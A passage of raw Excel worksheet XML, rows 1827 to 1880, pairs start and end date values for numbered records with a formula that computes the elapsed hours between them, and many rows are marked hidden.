      <c r="G1827" t="s">
        <v>55</v>
      </c>
      <c r="H1827" t="str">
        <f>TEXT(F1827-E1827,"[h]")</f>
        <v>16</v>
      </c>
    </row>
    <row r="1828" spans="1:8">
      <c r="A1828" t="s">
        <v>4706</v>
      </c>
      <c r="B1828">
        <v>11138</v>
      </c>
      <c r="C1828" t="s">
        <v>4707</v>
      </c>
      <c r="D1828" t="s">
        <v>7</v>
      </c>
      <c r="E1828" s="1">
        <v>43242.846956018519</v>
      </c>
      <c r="F1828" s="1">
        <v>43283.629652777781</v>
      </c>
      <c r="G1828" t="s">
        <v>189</v>
      </c>
      <c r="H1828" t="str">
        <f>TEXT(F1828-E1828,"[h]")</f>
        <v>978</v>
      </c>
    </row>
    <row r="1829" spans="1:8" hidden="1">
      <c r="A1829" t="s">
        <v>4708</v>
      </c>
      <c r="B1829">
        <v>11137</v>
      </c>
      <c r="C1829" t="s">
        <v>4709</v>
      </c>
      <c r="D1829" t="s">
        <v>7</v>
      </c>
      <c r="E1829" s="1">
        <v>43242.844004629631</v>
      </c>
      <c r="F1829" s="1">
        <v>43242.910810185182</v>
      </c>
      <c r="G1829" t="s">
        <v>81</v>
      </c>
      <c r="H1829" t="str">
        <f>TEXT(F1829-E1829,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1830" spans="1:8" hidden="1">
      <c r="A1830" t="s">
        <v>4710</v>
      </c>
      <c r="B1830">
        <v>11135</v>
      </c>
      <c r="C1830" t="s">
        <v>4711</v>
      </c>
      <c r="D1830" t="s">
        <v>7</v>
      </c>
      <c r="E1830" s="1">
        <v>43242.634189814817</v>
      </c>
      <c r="F1830" s="1">
        <v>43581.008252314816</v>
      </c>
      <c r="G1830" t="s">
        <v>4712</v>
      </c>
      <c r="H1830" t="str">
        <f>TEXT(F1830-E1830,"[h]")</f>
        <v>8120</v>
      </c>
    </row>
    <row r="1831" spans="1:8" hidden="1">
      <c r="A1831" t="s">
        <v>4713</v>
      </c>
      <c r="B1831">
        <v>11134</v>
      </c>
      <c r="C1831" t="s">
        <v>4714</v>
      </c>
      <c r="D1831" t="s">
        <v>7</v>
      </c>
      <c r="E1831" s="1">
        <v>43242.547083333331</v>
      </c>
      <c r="F1831" s="1">
        <v>43243.584999999999</v>
      </c>
      <c r="G1831" t="s">
        <v>66</v>
      </c>
      <c r="H1831" t="str">
        <f>TEXT(F1831-E1831,"[h]")</f>
        <v>24</v>
      </c>
    </row>
    <row r="1832" spans="1:8" hidden="1">
      <c r="A1832" t="s">
        <v>4715</v>
      </c>
      <c r="B1832">
        <v>11133</v>
      </c>
      <c r="C1832" t="s">
        <v>4716</v>
      </c>
      <c r="D1832" t="s">
        <v>7</v>
      </c>
      <c r="E1832" s="1">
        <v>43242.019490740742</v>
      </c>
      <c r="F1832" s="1">
        <v>43392.368819444448</v>
      </c>
      <c r="G1832" t="s">
        <v>4717</v>
      </c>
      <c r="H1832" t="str">
        <f>TEXT(F1832-E1832,"[h]")</f>
        <v>3608</v>
      </c>
    </row>
    <row r="1833" spans="1:8" hidden="1">
      <c r="A1833" t="s">
        <v>4718</v>
      </c>
      <c r="B1833">
        <v>11132</v>
      </c>
      <c r="C1833" t="s">
        <v>4719</v>
      </c>
      <c r="D1833" t="s">
        <v>7</v>
      </c>
      <c r="E1833" s="1">
        <v>43242.009652777779</v>
      </c>
      <c r="F1833" s="1">
        <v>43249.758125</v>
      </c>
      <c r="G1833" t="s">
        <v>4720</v>
      </c>
      <c r="H1833" t="str">
        <f>TEXT(F1833-E1833,"[h]")</f>
        <v>185</v>
      </c>
    </row>
    <row r="1834" spans="1:8" hidden="1">
      <c r="A1834" t="s">
        <v>4721</v>
      </c>
      <c r="B1834">
        <v>11129</v>
      </c>
      <c r="C1834" t="s">
        <v>4722</v>
      </c>
      <c r="D1834" t="s">
        <v>7</v>
      </c>
      <c r="E1834" s="1">
        <v>43241.66684027778</v>
      </c>
      <c r="F1834" s="1">
        <v>43388.235972222225</v>
      </c>
      <c r="G1834" t="s">
        <v>4723</v>
      </c>
      <c r="H1834" t="str">
        <f>TEXT(F1834-E1834,"[h]")</f>
        <v>3517</v>
      </c>
    </row>
    <row r="1835" spans="1:8" hidden="1">
      <c r="A1835" t="s">
        <v>4724</v>
      </c>
      <c r="B1835">
        <v>11127</v>
      </c>
      <c r="C1835" t="s">
        <v>4725</v>
      </c>
      <c r="D1835" t="s">
        <v>7</v>
      </c>
      <c r="E1835" s="1">
        <v>43241.469930555555</v>
      </c>
      <c r="F1835" s="1">
        <v>43509.738645833335</v>
      </c>
      <c r="G1835" t="s">
        <v>51</v>
      </c>
      <c r="H1835" t="str">
        <f>TEXT(F1835-E1835,"[h]")</f>
        <v>6438</v>
      </c>
    </row>
    <row r="1836" spans="1:8" hidden="1">
      <c r="A1836" t="s">
        <v>4726</v>
      </c>
      <c r="B1836">
        <v>11126</v>
      </c>
      <c r="C1836" t="s">
        <v>4727</v>
      </c>
      <c r="D1836" t="s">
        <v>7</v>
      </c>
      <c r="E1836" s="1">
        <v>43241.451990740738</v>
      </c>
      <c r="F1836" s="1">
        <v>43549.391516203701</v>
      </c>
      <c r="G1836" t="s">
        <v>4728</v>
      </c>
      <c r="H1836" t="str">
        <f>TEXT(F1836-E1836,"[h]")</f>
        <v>7390</v>
      </c>
    </row>
    <row r="1837" spans="1:8" hidden="1">
      <c r="A1837" t="s">
        <v>4729</v>
      </c>
      <c r="B1837">
        <v>11125</v>
      </c>
      <c r="C1837" t="s">
        <v>4730</v>
      </c>
      <c r="D1837" t="s">
        <v>7</v>
      </c>
      <c r="E1837" s="1">
        <v>43240.679097222222</v>
      </c>
      <c r="F1837" s="1">
        <v>43515.731747685182</v>
      </c>
      <c r="G1837" t="s">
        <v>204</v>
      </c>
      <c r="H1837" t="str">
        <f>TEXT(F1837-E1837,"[h]")</f>
        <v>6601</v>
      </c>
    </row>
    <row r="1838" spans="1:8">
      <c r="A1838" t="s">
        <v>4731</v>
      </c>
      <c r="B1838">
        <v>11124</v>
      </c>
      <c r="C1838" t="s">
        <v>4732</v>
      </c>
      <c r="D1838" t="s">
        <v>7</v>
      </c>
      <c r="E1838" s="1">
        <v>43239.705740740741</v>
      </c>
      <c r="F1838" s="1">
        <v>43242.100555555553</v>
      </c>
      <c r="G1838" t="s">
        <v>314</v>
      </c>
      <c r="H1838" t="str">
        <f>TEXT(F1838-E1838,"[h]")</f>
        <v>57</v>
      </c>
    </row>
    <row r="1839" spans="1:8">
      <c r="A1839" t="s">
        <v>4733</v>
      </c>
      <c r="B1839">
        <v>11122</v>
      </c>
      <c r="C1839" t="s">
        <v>4734</v>
      </c>
      <c r="D1839" t="s">
        <v>7</v>
      </c>
      <c r="E1839" s="1">
        <v>43239.684062499997</v>
      </c>
      <c r="F1839" s="1">
        <v>43258.835879629631</v>
      </c>
      <c r="G1839" t="s">
        <v>4735</v>
      </c>
      <c r="H1839" t="str">
        <f>TEXT(F1839-E1839,"[h]")</f>
        <v>459</v>
      </c>
    </row>
    <row r="1840" spans="1:8" hidden="1">
      <c r="A1840" t="s">
        <v>4736</v>
      </c>
      <c r="B1840">
        <v>11121</v>
      </c>
      <c r="C1840" t="s">
        <v>4737</v>
      </c>
      <c r="D1840" t="s">
        <v>7</v>
      </c>
      <c r="E1840" s="1">
        <v>43239.544675925928</v>
      </c>
      <c r="F1840" s="1">
        <v>43258.835879629631</v>
      </c>
      <c r="G1840" t="s">
        <v>4738</v>
      </c>
      <c r="H1840" t="str">
        <f>TEXT(F1840-E1840,"[h]")</f>
        <v>462</v>
      </c>
    </row>
    <row r="1841" spans="1:8" hidden="1">
      <c r="A1841" t="s">
        <v>4739</v>
      </c>
      <c r="B1841">
        <v>11120</v>
      </c>
      <c r="C1841" t="s">
        <v>4740</v>
      </c>
      <c r="D1841" t="s">
        <v>7</v>
      </c>
      <c r="E1841" s="1">
        <v>43239.265740740739</v>
      </c>
      <c r="F1841" s="1">
        <v>43247.067719907405</v>
      </c>
      <c r="G1841" t="s">
        <v>1448</v>
      </c>
      <c r="H1841" t="str">
        <f>TEXT(F1841-E1841,"[h]")</f>
        <v>187</v>
      </c>
    </row>
    <row r="1842" spans="1:8" hidden="1">
      <c r="A1842" t="s">
        <v>4741</v>
      </c>
      <c r="B1842">
        <v>11119</v>
      </c>
      <c r="C1842" t="s">
        <v>4742</v>
      </c>
      <c r="D1842" t="s">
        <v>7</v>
      </c>
      <c r="E1842" s="1">
        <v>43239.192152777781</v>
      </c>
      <c r="F1842" s="1">
        <v>43376.412754629629</v>
      </c>
      <c r="G1842" t="s">
        <v>2103</v>
      </c>
      <c r="H1842" t="str">
        <f>TEXT(F1842-E1842,"[h]")</f>
        <v>3293</v>
      </c>
    </row>
    <row r="1843" spans="1:8">
      <c r="A1843" t="s">
        <v>4743</v>
      </c>
      <c r="B1843">
        <v>11116</v>
      </c>
      <c r="C1843" t="s">
        <v>4744</v>
      </c>
      <c r="D1843" t="s">
        <v>7</v>
      </c>
      <c r="E1843" s="1">
        <v>43238.663194444445</v>
      </c>
      <c r="F1843" s="1">
        <v>43238.70417824074</v>
      </c>
      <c r="G1843" t="s">
        <v>16</v>
      </c>
      <c r="H1843" t="str">
        <f>TEXT(F1843-E1843,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1844" spans="1:8" hidden="1">
      <c r="A1844" t="s">
        <v>4745</v>
      </c>
      <c r="B1844">
        <v>11115</v>
      </c>
      <c r="C1844" t="s">
        <v>4746</v>
      </c>
      <c r="D1844" t="s">
        <v>7</v>
      </c>
      <c r="E1844" s="1">
        <v>43238.6090625</v>
      </c>
      <c r="F1844" s="1">
        <v>43245.881018518521</v>
      </c>
      <c r="G1844" t="s">
        <v>109</v>
      </c>
      <c r="H1844" t="str">
        <f>TEXT(F1844-E1844,"[h]")</f>
        <v>174</v>
      </c>
    </row>
    <row r="1845" spans="1:8">
      <c r="A1845" t="s">
        <v>4747</v>
      </c>
      <c r="B1845">
        <v>11114</v>
      </c>
      <c r="C1845" t="s">
        <v>4748</v>
      </c>
      <c r="D1845" t="s">
        <v>7</v>
      </c>
      <c r="E1845" s="1">
        <v>43238.589085648149</v>
      </c>
      <c r="F1845" s="1">
        <v>43628.842002314814</v>
      </c>
      <c r="G1845" t="s">
        <v>1267</v>
      </c>
      <c r="H1845" t="str">
        <f>TEXT(F1845-E1845,"[h]")</f>
        <v>9366</v>
      </c>
    </row>
    <row r="1846" spans="1:8" hidden="1">
      <c r="A1846" t="s">
        <v>4749</v>
      </c>
      <c r="B1846">
        <v>11112</v>
      </c>
      <c r="C1846" t="s">
        <v>4750</v>
      </c>
      <c r="D1846" t="s">
        <v>7</v>
      </c>
      <c r="E1846" s="1">
        <v>43237.778923611113</v>
      </c>
      <c r="F1846" s="1">
        <v>43261.835752314815</v>
      </c>
      <c r="G1846" t="s">
        <v>109</v>
      </c>
      <c r="H1846" t="str">
        <f>TEXT(F1846-E1846,"[h]")</f>
        <v>577</v>
      </c>
    </row>
    <row r="1847" spans="1:8" hidden="1">
      <c r="A1847" t="s">
        <v>4751</v>
      </c>
      <c r="B1847">
        <v>11110</v>
      </c>
      <c r="C1847" t="s">
        <v>4752</v>
      </c>
      <c r="D1847" t="s">
        <v>7</v>
      </c>
      <c r="E1847" s="1">
        <v>43237.38652777778</v>
      </c>
      <c r="F1847" s="1">
        <v>43481.376099537039</v>
      </c>
      <c r="G1847" t="s">
        <v>4753</v>
      </c>
      <c r="H1847" t="str">
        <f>TEXT(F1847-E1847,"[h]")</f>
        <v>5855</v>
      </c>
    </row>
    <row r="1848" spans="1:8" hidden="1">
      <c r="A1848" t="s">
        <v>4754</v>
      </c>
      <c r="B1848">
        <v>11107</v>
      </c>
      <c r="C1848" t="s">
        <v>4755</v>
      </c>
      <c r="D1848" t="s">
        <v>7</v>
      </c>
      <c r="E1848" s="1">
        <v>43236.5158912037</v>
      </c>
      <c r="F1848" s="1">
        <v>43246.694398148145</v>
      </c>
      <c r="G1848" t="s">
        <v>118</v>
      </c>
      <c r="H1848" t="str">
        <f>TEXT(F1848-E1848,"[h]")</f>
        <v>244</v>
      </c>
    </row>
    <row r="1849" spans="1:8">
      <c r="A1849" t="s">
        <v>4756</v>
      </c>
      <c r="B1849">
        <v>11106</v>
      </c>
      <c r="C1849" t="s">
        <v>4757</v>
      </c>
      <c r="D1849" t="s">
        <v>7</v>
      </c>
      <c r="E1849" s="1">
        <v>43236.467303240737</v>
      </c>
      <c r="F1849" s="1">
        <v>43245.192743055559</v>
      </c>
      <c r="G1849" t="s">
        <v>25</v>
      </c>
      <c r="H1849" t="str">
        <f>TEXT(F1849-E1849,"[h]")</f>
        <v>209</v>
      </c>
    </row>
    <row r="1850" spans="1:8" hidden="1">
      <c r="A1850" t="s">
        <v>4758</v>
      </c>
      <c r="B1850">
        <v>11105</v>
      </c>
      <c r="C1850" t="s">
        <v>4759</v>
      </c>
      <c r="D1850" t="s">
        <v>7</v>
      </c>
      <c r="E1850" s="1">
        <v>43236.344918981478</v>
      </c>
      <c r="F1850" s="1">
        <v>43249.029687499999</v>
      </c>
      <c r="G1850" t="s">
        <v>258</v>
      </c>
      <c r="H1850" t="str">
        <f>TEXT(F1850-E1850,"[h]")</f>
        <v>304</v>
      </c>
    </row>
    <row r="1851" spans="1:8">
      <c r="A1851" t="s">
        <v>4760</v>
      </c>
      <c r="B1851">
        <v>11104</v>
      </c>
      <c r="C1851" t="s">
        <v>4761</v>
      </c>
      <c r="D1851" t="s">
        <v>7</v>
      </c>
      <c r="E1851" s="1">
        <v>43235.970706018517</v>
      </c>
      <c r="F1851" s="1">
        <v>43250.012407407405</v>
      </c>
      <c r="G1851" t="s">
        <v>713</v>
      </c>
      <c r="H1851" t="str">
        <f>TEXT(F1851-E1851,"[h]")</f>
        <v>337</v>
      </c>
    </row>
    <row r="1852" spans="1:8" hidden="1">
      <c r="A1852" t="s">
        <v>4762</v>
      </c>
      <c r="B1852">
        <v>11103</v>
      </c>
      <c r="C1852" t="s">
        <v>4763</v>
      </c>
      <c r="D1852" t="s">
        <v>7</v>
      </c>
      <c r="E1852" s="1">
        <v>43235.825960648152</v>
      </c>
      <c r="F1852" s="1">
        <v>43250.657824074071</v>
      </c>
      <c r="G1852" t="s">
        <v>109</v>
      </c>
      <c r="H1852" t="str">
        <f>TEXT(F1852-E1852,"[h]")</f>
        <v>355</v>
      </c>
    </row>
    <row r="1853" spans="1:8" hidden="1">
      <c r="A1853" t="s">
        <v>4764</v>
      </c>
      <c r="B1853">
        <v>11098</v>
      </c>
      <c r="C1853" t="s">
        <v>4765</v>
      </c>
      <c r="D1853" t="s">
        <v>7</v>
      </c>
      <c r="E1853" s="1">
        <v>43234.707395833335</v>
      </c>
      <c r="F1853" s="1">
        <v>43238.841967592591</v>
      </c>
      <c r="G1853" t="s">
        <v>37</v>
      </c>
      <c r="H1853" t="str">
        <f>TEXT(F1853-E1853,"[h]")</f>
        <v>99</v>
      </c>
    </row>
    <row r="1854" spans="1:8">
      <c r="A1854" t="s">
        <v>4766</v>
      </c>
      <c r="B1854">
        <v>11097</v>
      </c>
      <c r="C1854" t="s">
        <v>4767</v>
      </c>
      <c r="D1854" t="s">
        <v>7</v>
      </c>
      <c r="E1854" s="1">
        <v>43234.702164351853</v>
      </c>
      <c r="F1854" s="1">
        <v>43246.33258101852</v>
      </c>
      <c r="G1854" t="s">
        <v>16</v>
      </c>
      <c r="H1854" t="str">
        <f>TEXT(F1854-E1854,"[h]")</f>
        <v>279</v>
      </c>
    </row>
    <row r="1855" spans="1:8" hidden="1">
      <c r="A1855" t="s">
        <v>4768</v>
      </c>
      <c r="B1855">
        <v>11095</v>
      </c>
      <c r="C1855" t="s">
        <v>4769</v>
      </c>
      <c r="D1855" t="s">
        <v>7</v>
      </c>
      <c r="E1855" s="1">
        <v>43234.595185185186</v>
      </c>
      <c r="F1855" s="1">
        <v>43249.331469907411</v>
      </c>
      <c r="G1855" t="s">
        <v>28</v>
      </c>
      <c r="H1855" t="str">
        <f>TEXT(F1855-E1855,"[h]")</f>
        <v>353</v>
      </c>
    </row>
    <row r="1856" spans="1:8" hidden="1">
      <c r="A1856" t="s">
        <v>4770</v>
      </c>
      <c r="B1856">
        <v>11094</v>
      </c>
      <c r="C1856" t="s">
        <v>4771</v>
      </c>
      <c r="D1856" t="s">
        <v>7</v>
      </c>
      <c r="E1856" s="1">
        <v>43234.452708333331</v>
      </c>
      <c r="F1856" s="1">
        <v>43235.702974537038</v>
      </c>
      <c r="G1856" t="s">
        <v>4772</v>
      </c>
      <c r="H1856" t="str">
        <f>TEXT(F1856-E1856,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="1857" spans="1:8">
      <c r="A1857" t="s">
        <v>4773</v>
      </c>
      <c r="B1857">
        <v>11091</v>
      </c>
      <c r="C1857" t="s">
        <v>4774</v>
      </c>
      <c r="D1857" t="s">
        <v>7</v>
      </c>
      <c r="E1857" s="1">
        <v>43234.073634259257</v>
      </c>
      <c r="F1857" s="1">
        <v>43235.704560185186</v>
      </c>
      <c r="G1857" t="s">
        <v>16</v>
      </c>
      <c r="H1857" t="str">
        <f>TEXT(F1857-E1857,"[h]")</f>
        <v>39</v>
      </c>
    </row>
    <row r="1858" spans="1:8">
      <c r="A1858" t="s">
        <v>4775</v>
      </c>
      <c r="B1858">
        <v>11090</v>
      </c>
      <c r="C1858" t="s">
        <v>4776</v>
      </c>
      <c r="D1858" t="s">
        <v>7</v>
      </c>
      <c r="E1858" s="1">
        <v>43234.069710648146</v>
      </c>
      <c r="F1858" s="1">
        <v>43251.699525462966</v>
      </c>
      <c r="G1858" t="s">
        <v>16</v>
      </c>
      <c r="H1858" t="str">
        <f>TEXT(F1858-E1858,"[h]")</f>
        <v>423</v>
      </c>
    </row>
    <row r="1859" spans="1:8">
      <c r="A1859" t="s">
        <v>4777</v>
      </c>
      <c r="B1859">
        <v>11089</v>
      </c>
      <c r="C1859" t="s">
        <v>4778</v>
      </c>
      <c r="D1859" t="s">
        <v>7</v>
      </c>
      <c r="E1859" s="1">
        <v>43233.812372685185</v>
      </c>
      <c r="F1859" s="1">
        <v>43254.542800925927</v>
      </c>
      <c r="G1859" t="s">
        <v>160</v>
      </c>
      <c r="H1859" t="str">
        <f>TEXT(F1859-E1859,"[h]")</f>
        <v>497</v>
      </c>
    </row>
    <row r="1860" spans="1:8" hidden="1">
      <c r="A1860" t="s">
        <v>4779</v>
      </c>
      <c r="B1860">
        <v>11088</v>
      </c>
      <c r="C1860" t="s">
        <v>4780</v>
      </c>
      <c r="D1860" t="s">
        <v>7</v>
      </c>
      <c r="E1860" s="1">
        <v>43233.743738425925</v>
      </c>
      <c r="F1860" s="1">
        <v>43249.056562500002</v>
      </c>
      <c r="G1860" t="s">
        <v>109</v>
      </c>
      <c r="H1860" t="str">
        <f>TEXT(F1860-E1860,"[h]")</f>
        <v>367</v>
      </c>
    </row>
    <row r="1861" spans="1:8" hidden="1">
      <c r="A1861" t="s">
        <v>4781</v>
      </c>
      <c r="B1861">
        <v>11086</v>
      </c>
      <c r="C1861" t="s">
        <v>4782</v>
      </c>
      <c r="D1861" t="s">
        <v>7</v>
      </c>
      <c r="E1861" s="1">
        <v>43233.649444444447</v>
      </c>
      <c r="F1861" s="1">
        <v>43235.716631944444</v>
      </c>
      <c r="G1861" t="s">
        <v>66</v>
      </c>
      <c r="H1861" t="str">
        <f>TEXT(F1861-E1861,"[h]")</f>
        <v>49</v>
      </c>
    </row>
    <row r="1862" spans="1:8" hidden="1">
      <c r="A1862" t="s">
        <v>4783</v>
      </c>
      <c r="B1862">
        <v>11085</v>
      </c>
      <c r="C1862" t="s">
        <v>4784</v>
      </c>
      <c r="D1862" t="s">
        <v>7</v>
      </c>
      <c r="E1862" s="1">
        <v>43233.638865740744</v>
      </c>
      <c r="F1862" s="1">
        <v>43233.761863425927</v>
      </c>
      <c r="G1862" t="s">
        <v>66</v>
      </c>
      <c r="H1862" t="str">
        <f>TEXT(F1862-E1862,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1863" spans="1:8" hidden="1">
      <c r="A1863" t="s">
        <v>4785</v>
      </c>
      <c r="B1863">
        <v>11084</v>
      </c>
      <c r="C1863" t="s">
        <v>4786</v>
      </c>
      <c r="D1863" t="s">
        <v>7</v>
      </c>
      <c r="E1863" s="1">
        <v>43233.611921296295</v>
      </c>
      <c r="F1863" s="1">
        <v>43295.186990740738</v>
      </c>
      <c r="G1863" t="s">
        <v>51</v>
      </c>
      <c r="H1863" t="str">
        <f>TEXT(F1863-E1863,"[h]")</f>
        <v>1477</v>
      </c>
    </row>
    <row r="1864" spans="1:8" hidden="1">
      <c r="A1864" t="s">
        <v>4787</v>
      </c>
      <c r="B1864">
        <v>11083</v>
      </c>
      <c r="C1864" t="s">
        <v>4788</v>
      </c>
      <c r="D1864" t="s">
        <v>7</v>
      </c>
      <c r="E1864" s="1">
        <v>43233.516516203701</v>
      </c>
      <c r="F1864" s="1">
        <v>43233.585104166668</v>
      </c>
      <c r="G1864" t="s">
        <v>95</v>
      </c>
      <c r="H1864" t="str">
        <f>TEXT(F1864-E1864,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1865" spans="1:8" hidden="1">
      <c r="A1865" t="s">
        <v>4789</v>
      </c>
      <c r="B1865">
        <v>11082</v>
      </c>
      <c r="C1865" t="s">
        <v>4790</v>
      </c>
      <c r="D1865" t="s">
        <v>7</v>
      </c>
      <c r="E1865" s="1">
        <v>43233.343587962961</v>
      </c>
      <c r="F1865" s="1">
        <v>43233.608425925922</v>
      </c>
      <c r="G1865" t="s">
        <v>51</v>
      </c>
      <c r="H1865" t="str">
        <f>TEXT(F1865-E1865,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1866" spans="1:8" hidden="1">
      <c r="A1866" t="s">
        <v>4791</v>
      </c>
      <c r="B1866">
        <v>11080</v>
      </c>
      <c r="C1866" t="s">
        <v>4792</v>
      </c>
      <c r="D1866" t="s">
        <v>7</v>
      </c>
      <c r="E1866" s="1">
        <v>43231.960520833331</v>
      </c>
      <c r="F1866" s="1">
        <v>43233.608425925922</v>
      </c>
      <c r="G1866" t="s">
        <v>66</v>
      </c>
      <c r="H1866" t="str">
        <f>TEXT(F1866-E1866,"[h]")</f>
        <v>39</v>
      </c>
    </row>
    <row r="1867" spans="1:8" hidden="1">
      <c r="A1867" t="s">
        <v>4793</v>
      </c>
      <c r="B1867">
        <v>11077</v>
      </c>
      <c r="C1867" t="s">
        <v>4794</v>
      </c>
      <c r="D1867" t="s">
        <v>7</v>
      </c>
      <c r="E1867" s="1">
        <v>43231.368738425925</v>
      </c>
      <c r="F1867" s="1">
        <v>43544.87091435185</v>
      </c>
      <c r="G1867" t="s">
        <v>769</v>
      </c>
      <c r="H1867" t="str">
        <f>TEXT(F1867-E1867,"[h]")</f>
        <v>7524</v>
      </c>
    </row>
    <row r="1868" spans="1:8">
      <c r="A1868" t="s">
        <v>4795</v>
      </c>
      <c r="B1868">
        <v>11076</v>
      </c>
      <c r="C1868" t="s">
        <v>4796</v>
      </c>
      <c r="D1868" t="s">
        <v>7</v>
      </c>
      <c r="E1868" s="1">
        <v>43231.276145833333</v>
      </c>
      <c r="F1868" s="1">
        <v>43231.883773148147</v>
      </c>
      <c r="G1868" t="s">
        <v>16</v>
      </c>
      <c r="H1868" t="str">
        <f>TEXT(F1868-E1868,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="1869" spans="1:8" hidden="1">
      <c r="A1869" t="s">
        <v>4797</v>
      </c>
      <c r="B1869">
        <v>11073</v>
      </c>
      <c r="C1869" t="s">
        <v>4798</v>
      </c>
      <c r="D1869" t="s">
        <v>7</v>
      </c>
      <c r="E1869" s="1">
        <v>43230.283541666664</v>
      </c>
      <c r="F1869" s="1">
        <v>43231.867430555554</v>
      </c>
      <c r="G1869" t="s">
        <v>66</v>
      </c>
      <c r="H1869" t="str">
        <f>TEXT(F1869-E1869,"[h]")</f>
        <v>38</v>
      </c>
    </row>
    <row r="1870" spans="1:8" hidden="1">
      <c r="A1870" t="s">
        <v>4799</v>
      </c>
      <c r="B1870">
        <v>11067</v>
      </c>
      <c r="C1870" t="s">
        <v>4800</v>
      </c>
      <c r="D1870" t="s">
        <v>7</v>
      </c>
      <c r="E1870" s="1">
        <v>43228.955000000002</v>
      </c>
      <c r="F1870" s="1">
        <v>43538.757476851853</v>
      </c>
      <c r="G1870" t="s">
        <v>4801</v>
      </c>
      <c r="H1870" t="str">
        <f>TEXT(F1870-E1870,"[h]")</f>
        <v>7435</v>
      </c>
    </row>
    <row r="1871" spans="1:8" hidden="1">
      <c r="A1871" t="s">
        <v>4802</v>
      </c>
      <c r="B1871">
        <v>11066</v>
      </c>
      <c r="C1871" t="s">
        <v>4803</v>
      </c>
      <c r="D1871" t="s">
        <v>7</v>
      </c>
      <c r="E1871" s="1">
        <v>43228.826481481483</v>
      </c>
      <c r="F1871" s="1">
        <v>43229.833773148152</v>
      </c>
      <c r="G1871" t="s">
        <v>2207</v>
      </c>
      <c r="H1871" t="str">
        <f>TEXT(F1871-E1871,"[h]")</f>
        <v>24</v>
      </c>
    </row>
    <row r="1872" spans="1:8">
      <c r="A1872" t="s">
        <v>4804</v>
      </c>
      <c r="B1872">
        <v>11064</v>
      </c>
      <c r="C1872" t="s">
        <v>4805</v>
      </c>
      <c r="D1872" t="s">
        <v>7</v>
      </c>
      <c r="E1872" s="1">
        <v>43228.636250000003</v>
      </c>
      <c r="F1872" s="1">
        <v>43229.283645833333</v>
      </c>
      <c r="G1872" t="s">
        <v>72</v>
      </c>
      <c r="H1872" t="str">
        <f>TEXT(F1872-E1872,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="1873" spans="1:8" hidden="1">
      <c r="B1873">
        <v>11063</v>
      </c>
      <c r="C1873" t="s">
        <v>4806</v>
      </c>
      <c r="D1873" t="s">
        <v>7</v>
      </c>
      <c r="E1873" s="1">
        <v>43228.358715277776</v>
      </c>
      <c r="F1873" s="1">
        <v>43260.006782407407</v>
      </c>
      <c r="G1873" t="s">
        <v>51</v>
      </c>
      <c r="H1873" t="str">
        <f>TEXT(F1873-E1873,"[h]")</f>
        <v>759</v>
      </c>
    </row>
    <row r="1874" spans="1:8" hidden="1">
      <c r="A1874" t="s">
        <v>4807</v>
      </c>
      <c r="B1874">
        <v>11061</v>
      </c>
      <c r="C1874" t="s">
        <v>4808</v>
      </c>
      <c r="D1874" t="s">
        <v>7</v>
      </c>
      <c r="E1874" s="1">
        <v>43227.747175925928</v>
      </c>
      <c r="F1874" s="1">
        <v>43249.217743055553</v>
      </c>
      <c r="G1874" t="s">
        <v>37</v>
      </c>
      <c r="H1874" t="str">
        <f>TEXT(F1874-E1874,"[h]")</f>
        <v>515</v>
      </c>
    </row>
    <row r="1875" spans="1:8" hidden="1">
      <c r="A1875" t="s">
        <v>4809</v>
      </c>
      <c r="B1875">
        <v>11058</v>
      </c>
      <c r="C1875" t="s">
        <v>4810</v>
      </c>
      <c r="D1875" t="s">
        <v>7</v>
      </c>
      <c r="E1875" s="1">
        <v>43227.002071759256</v>
      </c>
      <c r="F1875" s="1">
        <v>43295.213495370372</v>
      </c>
      <c r="G1875" t="s">
        <v>4811</v>
      </c>
      <c r="H1875" t="str">
        <f>TEXT(F1875-E1875,"[h]")</f>
        <v>1637</v>
      </c>
    </row>
    <row r="1876" spans="1:8">
      <c r="A1876" t="s">
        <v>4812</v>
      </c>
      <c r="B1876">
        <v>11057</v>
      </c>
      <c r="C1876" t="s">
        <v>4813</v>
      </c>
      <c r="D1876" t="s">
        <v>7</v>
      </c>
      <c r="E1876" s="1">
        <v>43226.937303240738</v>
      </c>
      <c r="F1876" s="1">
        <v>43226.970706018517</v>
      </c>
      <c r="G1876" t="s">
        <v>1709</v>
      </c>
      <c r="H1876" t="str">
        <f>TEXT(F1876-E1876,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1877" spans="1:8" hidden="1">
      <c r="A1877" t="s">
        <v>4814</v>
      </c>
      <c r="B1877">
        <v>11056</v>
      </c>
      <c r="C1877" t="s">
        <v>4815</v>
      </c>
      <c r="D1877" t="s">
        <v>7</v>
      </c>
      <c r="E1877" s="1">
        <v>43226.932974537034</v>
      </c>
      <c r="F1877" s="1">
        <v>43230.951643518521</v>
      </c>
      <c r="G1877" t="s">
        <v>769</v>
      </c>
      <c r="H1877" t="str">
        <f>TEXT(F1877-E1877,"[h]")</f>
        <v>96</v>
      </c>
    </row>
    <row r="1878" spans="1:8" hidden="1">
      <c r="B1878">
        <v>11055</v>
      </c>
      <c r="C1878" t="s">
        <v>4816</v>
      </c>
      <c r="D1878" t="s">
        <v>7</v>
      </c>
      <c r="E1878" s="1">
        <v>43226.761944444443</v>
      </c>
      <c r="F1878" s="1">
        <v>43226.803136574075</v>
      </c>
      <c r="G1878" t="s">
        <v>75</v>
      </c>
      <c r="H1878" t="str">
        <f>TEXT(F1878-E1878,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1879" spans="1:8" hidden="1">
      <c r="A1879" t="s">
        <v>4817</v>
      </c>
      <c r="B1879">
        <v>11053</v>
      </c>
      <c r="C1879" t="s">
        <v>4818</v>
      </c>
      <c r="D1879" t="s">
        <v>7</v>
      </c>
      <c r="E1879" s="1">
        <v>43225.794965277775</v>
      </c>
      <c r="F1879" s="1">
        <v>43225.80972222222</v>
      </c>
      <c r="G1879" t="s">
        <v>90</v>
      </c>
      <c r="H1879" t="str">
        <f>TEXT(F1879-E1879,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1880" spans="1:8">
      <c r="A1880" t="s">
        <v>4819</v>
      </c>
